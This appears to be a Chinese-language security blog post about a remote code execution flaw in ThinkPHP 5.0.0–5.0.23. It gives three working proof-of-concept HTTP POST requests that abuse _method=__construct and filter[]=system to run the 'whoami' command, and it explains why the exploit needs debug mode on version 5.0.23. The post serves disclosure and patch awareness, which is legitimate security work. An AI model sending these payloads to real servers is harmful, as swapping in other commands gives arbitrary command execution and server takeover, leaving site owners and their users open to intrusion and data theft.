Thinkphp5.x又双叒叕一个远程代码执行

今天thinkphp官方又双叒叕发布了5.0.24版本，包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后，今天晚上又爆出来远程代码执行，见官方公告。

影响范围

thinkphp5.0.0~5.0.23

各版本PoC

thinkphp5.0.10版本poc如图

POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
​
s=whoami&_method=__construct&method=&filter[]=system

 

在官网最新下载的5.0.23完整版中，在App类（thinkphp/library/think/App.php）中module方法增加了设置filter参数值的代码，用于初始化filter。因此通过上述请求设置的filter参数值会被重新覆盖为空导致无法利用。

thinkphp5.0.23版本需要开启debug模式才可以利用，附两个poc：

POST /thinkphp/public/index.php HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
​
_method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami

 

POST /thinkphp/public/index.php?s=captcha HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
​
_method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami

 

上一个rec参考链接

thinkphp5框架缺陷导致远程代码执行

https://y4er.com/post/thinkphp5.x-rce-18-12-9/